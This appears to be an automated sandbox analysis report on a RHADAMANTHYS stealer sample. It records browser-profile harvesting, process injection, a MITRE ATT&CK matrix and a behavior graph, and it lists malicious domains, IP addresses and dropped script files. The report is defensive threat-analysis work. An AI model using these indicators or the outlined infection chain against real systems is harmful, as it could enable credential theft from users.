                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Program Files\Windows Media Player\wmprph.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Program Files\Windows Media Player\wmprph.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B859B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,21_2_00007DF4F3B859B0
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 00000014.00000003.2350109419.0000000000760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2346049870.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2360678869.0000000023FB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.2450181314.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN

                        Remote Access Functionality

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 00000014.00000003.2350109419.0000000000760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2346049870.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2360678869.0000000023FB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.2450181314.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B859B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,21_2_00007DF4F3B859B0
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 25_2_000001716185D004 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,25_2_000001716185D004

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information211
                        Scripting                        		Valid Accounts111
                        Windows Management Instrumentation                        		211
                        Scripting                        		1
                        DLL Side-Loading                        		12
                        Obfuscated Files or Information                        		1
                        OS Credential Dumping                        		13
                        File and Directory Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		1
                        Extra Window Memory Injection                        		1
                        Software Packing                        		LSASS Memory225
                        System Information Discovery                        		Remote Desktop Protocol11
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		1
                        Create Account                        		512
                        Process Injection                        		1
                        DLL Side-Loading                        		Security Account Manager221
                        Security Software Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        PowerShell                        		Login HookLogin Hook1
                        Extra Window Memory Injection                        		NTDS141
                        Virtualization/Sandbox Evasion                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                        Masquerading                        		LSA Secrets2
                        Process Discovery                        		SSHKeylogging3
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                        Virtualization/Sandbox Evasion                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items512
                        Process Injection                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577817 Sample: List of required items and ... Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 67 www.tdejb.com 2->67 69 www.astenterprises.com.pk 2->69 71 13 other IPs or domains 2->71 95 Suricata IDS alerts for network traffic 2->95 97 Malicious sample detected (through community Yara rule) 2->97 99 Yara detected RHADAMANTHYS Stealer 2->99 101 10 other signatures 2->101 11 wscript.exe 1 2->11         started        14 powershell.exe 15 2->14         started        16 svchost.exe 2->16         started        signatures3 process4 dnsIp5 111 VBScript performs obfuscated calls to suspicious functions 11->111 113 Suspicious powershell command line found 11->113 115 Wscript starts Powershell (via cmd or directly) 11->115 125 2 other signatures 11->125 19 powershell.exe 20 19 11->19         started        117 Early bird code injection technique detected 14->117 119 Writes to foreign memory regions 14->119 121 Found suspicious powershell code related to unpacking or dynamic code loading 14->121 123 Queues an APC in another process (thread injection) 14->123 24 msiexec.exe 14->24         started        26 conhost.exe 14->26         started        65 127.0.0.1 unknown unknown 16->65 signatures6 process7 dnsIp8 73 astenterprises.com.pk 107.161.23.150, 443, 49730 RAMNODEUS United States 19->73 75 fornid.com 93.95.216.175, 443, 49739 SERVERPLAN-ASIT Italy 19->75 61 C:\Users\Public\rdc7di6ccs.docx, Microsoft 19->61 dropped 63 C:\Users\Public\g8ix97hz.vbs, ASCII 19->63 dropped 103 Found suspicious powershell code related to unpacking or dynamic code loading 19->103 28 wscript.exe 1 19->28         started        31 WINWORD.EXE 181 440 19->31         started        33 conhost.exe 19->33         started        105 Switches to a custom stack to bypass stack traces 24->105 35 svchost.exe 24->35         started        file9 signatures10 process11 dnsIp12 127 Suspicious powershell command line found 28->127 129 Wscript starts Powershell (via cmd or directly) 28->129 38 WMIC.exe 1 28->38         started        41 powershell.exe 16 28->41         started        77 87.120.127.215, 3847, 49840, 49901 UNACS-AS-BG8000BurgasBG Bulgaria 35->77 131 System process connects to network (likely due to code injection or exploit) 35->131 133 Switches to a custom stack to bypass stack traces 35->133 44 svchost.exe 35->44         started        signatures13 process14 dnsIp15 107 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 38->107 46 conhost.exe 38->46         started        83 tdejb.com 202.71.109.228, 443, 49732, 49809 TMVADS-APTM-VADSDCHostingMY Malaysia 41->83 48 conhost.exe 41->48         started        85 time-a-g.nist.gov 129.6.15.28, 123, 51022 US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS United States 44->85 87 ntp1.net.berkeley.edu 169.229.128.134, 123, 51022 UCBUS United States 44->87 89 5 other IPs or domains 44->89 109 Tries to harvest and steal browser information (history, passwords, etc) 44->109 50 wmprph.exe 44->50         started        53 chrome.exe 44->53         started        signatures16 process17 dnsIp18 91 Writes to foreign memory regions 50->91 93 Allocates memory in foreign processes 50->93 56 dllhost.exe 50->56         started        79 239.255.255.250 unknown Reserved 53->79 59 chrome.exe 53->59         started        signatures19 process20 dnsIp21 81 45.149.241.141, 443, 49943, 49962 UUNETUS Germany 56->81

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

